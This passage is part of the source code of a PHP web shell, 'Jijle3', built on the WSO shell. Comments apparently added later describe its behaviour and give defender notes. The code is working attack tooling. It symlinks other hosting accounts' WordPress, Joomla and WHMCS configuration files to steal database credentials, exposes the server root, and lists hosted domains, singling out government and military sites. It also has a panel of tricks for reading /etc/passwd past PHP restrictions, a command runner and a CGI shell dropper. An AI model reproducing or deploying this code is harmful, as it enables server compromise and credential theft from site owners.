1002ForceType text/plain
1003AddType text/plain .php
1004AddType text/plain .html
1005AddType text/html .shtml
1006AddType txt .php
1007AddHandler server-parsed .php
1008AddHandler txt .php
1009AddHandler txt .html
1010AddHandler txt .shtml
1011Options All
1012Options All";
// FILE_APPEND means repeated runs keep adding the same directives to the file.
// The POSTed `passwd` text is split into lines and used without validation.
1013file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "<br><br><center><font>Bism Allah</center><br>";
// One pass per line: field 0 becomes $user and every symlink() below is
// @-silenced, so missing targets or permission errors produce no output.
1014foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.ph
p',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
// The response ends with a link to the drop directory created above.
1015echo '<b class="cone"><font><b>Configs Link : </b> <a target="_blank" href="phdz-config">[ Configs ]</a></font></b>';}
1016wsoFooter();}
1017###################### About ############################
/**
 * Web-shell action "about": prints a static credits page (ASCII banner, a
 * Facebook like-box iframe, author/contact lines and a greetings list) between
 * wsoHeader() and wsoFooter(). No request input is read in this function.
 *
 * Defender notes: the fixed strings emitted here are stable text to match on
 * when hunting for copies of this shell in web roots or in HTTP responses.
 * The iframe makes the viewer's browser contact facebook.com when the page is
 * opened. The last PHP block is reopened with the short tag `<?`, which is
 * only parsed when short_open_tag is enabled.
 */
1018function actionabout() {
1019wsoHeader();
1020echo'
1021<center>
1022<h1>[ About ]</h1>
1023<br /><br />
1024</form>
1025';
1026?><head>
1027<span class="style1"><font size="3" color="#FFFFFF" face="Adobe Heiti Std R"></font> <div style='font-family: Courier New; font-size: 10px;'><font color='white' class=txt ><pre>
1028 _ _ _ _ _____ ____ _ _ ____
1029 | | (_) (_) | | ___ |___ / | _ \ | | | | | _ \
1030 _ | | | | | | | | / _ \ |_ \ | |_) | | |_| | | |_) |
1031| |_| | | | | | | | | __/ ___) | | __/ | _ | | __/
1032 \___/ |_| _/ | |_| \___| |____/ |_| |_| |_| |_|
1033 |__/
1034 ____ _ _ _
1035/ ___| | |__ ___ | | | |
1036\___ \ | '_ \ / _ \ | | | |
1037 ___) | | | | | | __/ | | | |
1038|____/ |_| |_| \___| |_| |_|
1039<span class="style1"><font size="9" color="#FFFFFF" face="Adobe Heiti Std R"></font><p>
1040<pre>
1041<iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FJ1jeI&width&height=62&colorscheme=light&show_faces=false&header=true&stream=false&show_border=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:62px;" allowTransparency="true"></iframe><pre>
1042<p><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1043Jijle3 PHP Web Shell Created To Make Web Site Hacking More Easy ..<br><br> And To Gev You Some Normal Tools ! With WSO Theme<br><br> iF You Want Me To Add A Notther Tools in Secend Virsion Mail Me in My E-mail Bellow Or in My Facebook Page !<br><br></font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1044<div style='font-family: Courier New; font-size: 10px;'><font size='2' class=txt ><pre>
1045Coded By Phenomene Dz <br>Algeria - Jijel<br>Finished in 2015/02/03<br>My Email - dzph@bk.ru -<br>Youtube Channel <a href="http://www.youtube.com/DZPH/" target="_blank">YouTube</a><br><br>All Right Reserved (C) Phenomene Dz - Martyrs Crew 2015
1046<font size="13" face="Adobe Heiti Std R" color="red"></font><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1047[ Thanks To ] <br><br>Abod Hack - Red Ck - Ghost1145 - Prodigy Tn - EL Moj4hid - Ghost dz - L'Apoca Dz - Mr Dz Gang <br><br> Sy3i4n K!lle3 - Red Hell Sofyan - Algeriano - Hero Dz - Cesc Dz - X Zone - K2ll33d - Almokawim <br><br> Martyrs Team - Algerian To The Core - 1337day Community Algeria - Fallaga Team <br><br> AnonGhost Team - Dz Team - Anonymous Dz - Backup Sec Dz <br><br> Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com - dz-root.com - is-sec.com <br><br> And All My Freinds - All Muslims Hackers - All Algerian Hackers <font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#FFFFFF" face="Adobe Heiti Std R"></font></span></p>
1048<?
1049wsoFooter(); }
1050###################### Symlink Server ############################
/**
 * Web-shell action "symserver": exposes the host filesystem through a symlink
 * in the web root and lists hosted domains with their owning accounts.
 *
 * Flow, as visible below:
 *  - Creates `phdz-symserver/` with mode 0777, writes an .htaccess into it and
 *    symlinks `/` to `phdz-symserver/root`.
 *  - Reads /etc/named.conf; for each line containing "zone" it extracts the
 *    quoted zone name, resolves the owner of /etc/valiases/<zone> with
 *    posix_getpwuid(fileowner(...)), and prints a table row linking to
 *    `sym/root/home/<owner>/public_html`.
 *
 * Defender notes: artefacts are the `phdz-symserver` directory, its .htaccess
 * (contains "Require None" and "Satisfy Any") and symlinks named `root` that
 * point at `/`. A web-server account that can read /etc/named.conf and stat
 * /etc/valiases/* gives this function its domain-to-account map; alerting on
 * symlinks to `/` under document roots catches the drop itself.
 */
1051function actionsymserver() {
1052wsoHeader();
1053echo'<center><h1>Symlink Server</h1><br>';
// Removes the script execution time limit (errors silenced).
1054@set_time_limit(0);
1055echo "<center>";
1056
// World-writable drop directory plus an .htaccess that maps .php/.html to
// text/plain and relaxes access control for that directory.
1057@mkdir('phdz-symserver',0777);
1058$htaccess = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1059$write =@fopen ('phdz-symserver/.htaccess','w');
1060fwrite($write ,$htaccess);
// Link to the filesystem root, placed inside the web-served directory.
1061@symlink('/','phdz-symserver/root');
1062$filelocation = basename(__FILE__);
// Source of the hosted-domain list. The message in the failure branch says
// "Not Writeable", but the condition only tests whether the read returned
// anything.
1063$read_named_conf = @file('/etc/named.conf');
1064if(!$read_named_conf)
1065{
1066echo "<pre class=ml1 style='margin-top:5px'>[ /etc/named.conf ] ==> Not Writeable !</pre></center>";
1067}
1068else
1069{
1070echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
1071foreach($read_named_conf as $subject){
// NOTE(review): eregi() was removed in PHP 7.0, so this loop body dates the
// sample to PHP 5.x hosts.
1072if(eregi('zone',$subject)){
1073preg_match_all('#zone "(.*)"#',$subject,$string);
1074flush();
1075if(strlen(trim($string[1][0])) >2){
// The owner of the per-domain file under /etc/valiases is taken as the
// account that hosts the domain.
1076$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
1077$name = $UID['name'] ;
// A second link to `/` is attempted on every iteration, under `sym/`.
1078@symlink('/','sym/root');
1079$name = $string[1][0];
// Unanchored patterns; a domain matching any of them is only rendered in red
// below, it is still listed and linked like the others.
1080$iran = '\.ir';
1081$israel = '\.il';
1082$indo = '\.id';
1083$sg12 = '\.sg';
1084$edu = '\.edu';
1085$gov = '\.gov';
1086$gose = '\.go';
1087$gober = '\.gob';
1088$mil1 = '\.mil';
1089$mil2 = '\.mi';
1090if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
1091or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
1092{
1093$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
1094}
// One table row per zone: domain link, owning account, and a link through the
// root symlink to that account's public_html. Values are written into the
// HTML without escaping.
1095echo "
1096<tr>
1097
1098<td>
1099<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
1100</td>
1101
1102<td>
1103'.$UID['name']."
1104</td>
1105
1106<td>
1107<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
1108</td>
1109
1110</tr></div> ";
1111flush();
1112}
1113}
1114}
1115}
1116
1117echo "</center></table>";
1118wsoFooter(); }
1119///Menus
1120####################### Bypassers #########################
/**
 * Web-shell action "bypss": menu page only. Between wsoHeader() and
 * wsoFooter() it prints four links whose onclick handlers call the page's
 * client-side g() function with the action names 'bypassing', 'etcnmd',
 * 'etcbaypass' and 'SafeMode', passing $GLOBALS['home_cwd'] as the second
 * argument. Nothing is read from the request and nothing is written to disk
 * here.
 *
 * Defender note: the four action names and link captions are fixed strings
 * and can serve as match text for this shell family. `home_cwd` is
 * concatenated into the onclick attribute without escaping.
 */
1121function actionbypss() {
1122wsoHeader();
1123echo'
1124<center>
1125<a href=# onclick="g(\'bypassing\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Jijle3 Bypasser ]</a><br><br>
1126<a href=# onclick="g(\'etcnmd\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Server User Function Bypasser ]</a><br><br>
1127<a href=# onclick="g(\'etcbaypass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Etc/passwd/ Function Bypasser ]</a><br><br>
1128<a href=# onclick="g(\'SafeMode\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Safe Mode Bypass ]</a><br>
1129';
1130wsoFooter();}
1131####################### bypassing #########################
1132function actionbypassing() {
1133wsoHeader();
1134echo '<center><h1>Jijle3 Function Bypasser </h1>';
1135error_reporting(0);
1136set_magic_quotes_runtime(0);
1137if(version_compare(phpversion(), '4.1.0') == -1)
1138 {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
1139 $_SERVER = &$HTTP_SERVER_VARS;
1140 }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
1141if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
1142elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
1143else{return $requ."?".$link."=".$val;}}
1144function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";}
1145function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
1146$nscmd=htmlspecialchars($scmd);print $nscmd;}
1147elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
1148$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
1149elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
1150while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
1151print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
1152ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
1153ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
1154print htmlspecialchars($pret);}}
1155function input($type,$name,$value,$size)
1156{if (empty($value)){print "<input type=$type name=$name size=$size>";}
1157elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
1158elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
1159else {print "<input type=$type name=$name value=$value size=$size >";}}
1160function permcol($path){if (is_writable($path)){print "<font color=#008080>";
1161callperms($path); print "</font>";}
1162elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
1163callperms($path); print "</font>";}
1164else {print "<font color=white>";callperms($path);}}
1165if ($dlink=="dwld"){download($_REQUEST['dwld']);}
1166function download($dwfile) {$size = filesize($dwfile);
1167@header("Content-Type: application/force-download;name=$dwfile");
1168@header("Content-Transfer-Encoding: binary");
1169@header("Content-Length: $size");
1170@header("Content-Disposition: attachment; filename=$dwfile");
1171@header("Expires: 0");
1172@header("Cache-Control: no-cache, must-revalidate");
1173@header("Pragma: no-cache");
1174@readfile($dwfile); exit;}
1175?>
1176<?
1177$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
1178$sf="<form method=post>";$ef="</form>";
1179$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
1180$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
1181$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
1182$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
1183$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
1184///////////////////////////////
1185 //
1186$mysql_use = "no"; //"yes" //
1187$mhost = "localhost"; //
1188$muser = "root"; //
1189$mpass = "pass"; //
1190$mdb = "name"; //
1191$them = "xxx"; //any site //
1192$you = "xx"; //your username //
1193$flib = "hack15.txt"; //
1194$folder = "hack15.txt"; //
1195///////////////////////////////
1196################# PhP Hacked ########################
1197// read greet //
1198if ($linux=='greet')
1199{
1200 echo "</textarea>";
1201}
1202// read file unzend sorce //
1203if(empty($_POST['sorce'])){
1204} else {
1205}
1206// read file unzend functions //
1207 if(empty($_POST['func'])){
1208} else {
1209echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1210$zeen=$_POST['func'];
1211require("$zeen");
1212echo "Database : ".$config['Database']['dbname']." <X> ";
1213echo "UserName : ".$config['MasterServer']['username']." <X> ";
1214echo "Password : ".$config['MasterServer']['password']." <X> ";
1215echo "</textarea></p>";
1216}// read file symlink ( ) //
1217if(empty($_POST['sym'])){
1218} else {
1219echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1220$fp = fopen("hack15.txt","w+");
1221fwrite($fp,"Php Hacker Was Here");
1222@unlink($flib);
1223$sym = "/home/" . $them . "/public_html/" . $k;
1224$link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
1225@symlink($sym, $link);
1226if ($k{0} == "/") {
1227echo "<script> window.location = '" . $flib . "'</script>";
1228}else{
1229echo "<pre><xmp>";
1230echo readlink($flib) . "\n";
1231echo "Filesize: " . linkinfo($flib) . "B\n\n";
1232echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
1233 echo "</textarea>";
1234}
1235}
1236
1237// read file plugin ( ) //
1238if(empty($_POST['plugin'])){
1239} else {
1240echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1241for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
1242 $ara = posix_getpwuid($uid);
1243 if (!empty($ara)) {
1244 while (list ($key, $val) = each($ara)){
1245 print "$val:";
1246 }
1247 print "\n";
1248 }
1249 }
1250 echo "</textarea>";
1251}
1252// read file id ( ) //
1253if ($_POST['rid'] ){
1254echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1255 for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
1256$ara = posix_getpwuid($uid);
1257 if (!empty($ara)) {
1258while (list ($key, $val) = each($ara)){
1259print "$val:";
1260}
1261 print "\n";
1262}
1263 }
1264echo "</textarea>";
1265break;
1266
1267 }
1268// read file imap ( ) //
1269$string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
1270if(empty($_POST['rimap'])){
1271} else {
1272echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1273$stream = imap_open($string, "", "");
1274$str = imap_body($stream, 1);
1275echo "</textarea>";
1276}
1277// read file Curl ( ) //
1278if(empty($_POST['curl'])){
1279} else {
1280echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1281$m=$_POST['curl'];
1282$ch =
1283curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
1284curl_exec($ch);
1285var_dump(curl_exec($ch));
1286echo "</textarea>";
1287}
1288// read file SQL ( ) //
1289if(empty($_POST['ssql'])){
1290} else {
1291echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1292$file=$_POST['ssql'];
1293$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
1294$mysql_files = explode(':', $mysql_files_str);
1295$sql = array (
1296"USE $mdb",
1297'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
1298"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
1299. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
1300. "ESCAPED BY '' "
1301. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
1302"SELECT a FROM $tbl LIMIT 1"
1303);
1304mysql_connect ($mhost, $muser, $mpass);
1305 foreach ($sql as $statement) {
1306 $q = mysql_query ($statement);
1307 if ($q == false) die (
1308 "FAILED: " . $statement . "\n" .
1309 "REASON: " . mysql_error () . "\n"
1310 );
1311 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
1312 echo htmlspecialchars($r[0]);
1313 mysql_free_result ($q);
1314 }
1315echo "</textarea>";
1316}
1317// read file copy & ini ( ) //
1318if (isset ($_REQUEST['safefile'])){
1319$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
1320if(empty($_GET['file'])){if(empty($_POST['file'])){
1321print "<center>[ Please choose a file first to read it using copy() ]</center>";
1322} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
1323$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
1324$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
1325fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
1326print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
1327</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
1328ini_restore("safe_mode");ini_restore("open_basedir");
1329print "<center><pre>".$sta;
1330if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}
1331}
1332?>
1333</center><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%>
1334<tr><td height=22% style="border:1px #dadada solid "><div><b>
1335<center>
1336Using copy() function</div></tr></td><tr>
1337<td style="border:1px #dadada solid "><form method=post>
1338<input type=text name=safefile value=/etc/passwd size=75 >
1339<input type=hidden name=scdir value=/etc/passwd >
1340<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1341</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
1342<td height=22% style="border:1px #dadada solid "><div><b><center>
1343Using ini_restore() function</div></tr></td><tr>
1344<td style="border:1px #dadada solid "><form method=post>
1345<input type=text name=inifile value=/etc/passwd size=75 >
1346<input type=hidden name=scdir value=/etc/passwd >
1347<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1348</center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr>
1349<td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1350Using sql() function</div></tr></td><tr>
1351<td style="border:1px #dadada solid "><form method=post>
1352<input type=text name=ssql value=/etc/passwd size=75 >
1353<input type=hidden name=scdir value=/etc/passwd >
1354<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1355</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1356Using Curl() function</div></tr></td><tr>
1357<td style="border:1px #dadada solid "><form method=post>
1358<input type=text name=curl value=/etc/passwd size=75 >
1359<input type=hidden name=scdir value=/etc/passwd >
1360<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1361</center></tr></td></form></table></td></tr></table>
1362<table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left>
1363<table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1364Using imap() function</div></tr></td><tr>
1365<td style="border:1px #dadada solid "><form method=post>
1366<input type=text name=rimap value=/etc/passwd size=75 >
1367<input type=hidden name=scdir value=/etc/passwd >
1368<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1369</center></tr></td></form></table></td>
1370<td height=20% width=50%><div align=right>
1371<table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1372Using id() function</div></tr></td><tr>
1373<td style="border:1px #dadada solid "><form method=post>
1374<input type=text name=rid value=/etc/passwd size=75 >
1375<input type=hidden name=scdir value=/etc/passwd >
1376<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1377</center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%>
1378<tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
1379Using plugin() function</div></tr></td><tr>
1380<td style="border:1px #dadada solid "><form method=post>
1381<input type=text name=plugin value=/etc/passwd size=75 >
1382<input type=hidden name=scdir value=/etc/passwd >
1383<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1384</center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
1385<td height=22% style="border:1px #dadada solid "><div><b><center>
1386Using symlink() function</div></tr></td><tr>
1387<td style="border:1px #dadada solid "><form method=post>
1388<input type=text name=sym value=/etc/passwd size=75 >
1389<input type=hidden name=scdir value=/etc/passwd >
1390<input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
1391</center></tr></td></form></table></td></tr></table>
1392<?php
1393wsoFooter(); }
1394####################### symlinker #########################
// Renders a three-entry menu. Each link calls the client-side helper g()
// (defined outside this excerpt) with an action name -- 'sym', 'symserver' or
// 'cms' -- and $GLOBALS['home_cwd'].
// NOTE(review): home_cwd is concatenated into a single-quoted JavaScript string
// inside an onclick attribute with no escaping.
// Defender note: the action names are fixed strings and can serve as
// content-signature terms; how g() submits them is not visible here.
1395function actionsymlinker() {
1396wsoHeader();
1397echo'
1398<center>
1399<a href=# onclick="g(\'sym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Symlink File ]</a><br><br>
1400<a href=# onclick="g(\'symserver\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Symlink Server From Named.conf ]</a><br><br>
1401<a href=# onclick="g(\'cms\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ CMS Detector ]</a><br>
1402';
1403wsoFooter();}
1404####################### CMS #########################
// "CMS Detector" action: walks the DNS zone files on this host to list hosted
// domains and the local account that owns each one.
//
// First run (no pee.tmp in the working directory): creates pee.tmp, lists
// /var/named, and for every entry whose name contains ".db" after position 0
// strips ".db", resolves the owner of /etc/valiases/<domain> with
// fileowner() + posix_getpwuid(), and calls cms_add() (defined outside this
// excerpt) once for each of twelve product names.
// Later runs: echoes whatever is fetched from $pageURL.'pee.tmp', unescaped.
//
// NOTE(review): $pwd and $pageURL are not assigned anywhere in this function;
// presumably they are expected from elsewhere -- cannot confirm from here.
// Defender notes: artefacts are a file `pee.tmp` and URLs under `pee/` next to
// the script. The routine only has data where the web-server account can read
// /var/named and /etc/valiases; denying those reads (file permissions,
// open_basedir) removes its source.
1405function actioncms() {
1406wsoHeader();
1407 ?>
1408 <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
1409<center><b><h1>CMS Detector</h1></b></center><br><br>
1410 <?php
// pee.tmp doubles as the "scan already done" flag checked on every call.
1411if(!file_exists('pee.tmp')){
// The handle returned by fopen() is discarded and never closed; the call only creates the file.
1412@fopen('pee.tmp', 'w');
1413
1414echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1415echo'<tr><td><center><b>[ Web Site ]</b></center></td><td><center><b>[ User ]</b></center></td><td><center><b>[ CMS ]</b></center></td></table>';
1416
1417$p = 0;
1418
1419if(is_readable("/var/named")){
1420$list = scandir("/var/named");
1421$current_dir = posix_getcwd();
1422$dir = explode("/",$current_dir);
1423foreach($list as $domain){
// strpos() is used for its truthiness: a match at offset 0 counts as "no match".
1424if(strpos($domain,".db"))
1425{
1426 $domain = str_replace('.db','',$domain);
1427 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1428
// Turns off PHP error reporting for the rest of the request.
1429error_reporting(0);
1430
1431$link = $pageURL.'pee/'.$owner['name'];
1432
1433cms_add($link,$domain,$owner['name'],"WordPress");
1434cms_add($link,$domain,$owner['name'],"Joomla");
1435cms_add($link,$domain,$owner['name'],"vBulletin");
1436cms_add($link,$domain,$owner['name'],"WHMCS");
1437cms_add($link,$domain,$owner['name'],"PhpBB");
1438cms_add($link,$domain,$owner['name'],"MyBB");
1439cms_add($link,$domain,$owner['name'],"IPB");
1440cms_add($link,$domain,$owner['name'],"SMF");
1441cms_add($link,$domain,$owner['name'],"Drupal");
1442cms_add($link,$domain,$owner['name'],"e107");
1443cms_add($link,$domain,$owner['name'],"Seditio");
1444cms_add($link,$domain,$owner['name'],"osCommerce");
1445}
1446}
1447}
1448}else{
1449echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1450echo'<tr><td><center><b>[ Web Site ]</b></center></td><td><center><b>[ User ]</b></center></td><td><center><b>[ CMS ]</b></center></td></table><br><br>';
// Fetched content is printed as-is, with no HTML escaping.
1451$content = file_get_contents($pageURL.'pee.tmp');
1452echo $content;
1453}
1454wsoFooter();}
1455##################### CGI SHELL ####################
1456function actioncgi() {
1457wsoHeader();
1458echo '<center><h1>Sample CGI Perl Shell</h1><div class=content>';
1459echo '<center><h2>Password : jijle3</h2><div class=content>';
1460
1461mkdir('cgi-telnet', 0755);
1462 chdir('cgi-telnet');
1463 $kokdosya = ".htaccess";
1464 $dosya_adi = "$kokdosya";
1465 $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
1466 $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1467
1468AddType application/x-httpd-cgi .cin
1469
1470AddHandler cgi-script .cin
1471AddHandler cgi-script .cin";
